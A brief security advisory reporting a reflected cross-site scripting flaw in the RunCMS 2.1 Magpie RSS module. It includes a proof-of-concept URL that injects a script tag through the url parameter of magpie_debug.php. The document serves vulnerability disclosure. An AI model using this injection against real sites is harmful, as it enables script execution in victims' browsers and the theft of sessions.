A reflected cross-site scripting vulnerability in RunCMS 2.1 Magpie RSS Module can be exploited to execute arbitrary JavaScript.
PoC
http://localhost/runcms2.1/modules/headlines/magpierss/scripts/magpie_debug.php?url=%3Cscript%3Ealert(0)%3C/script%3E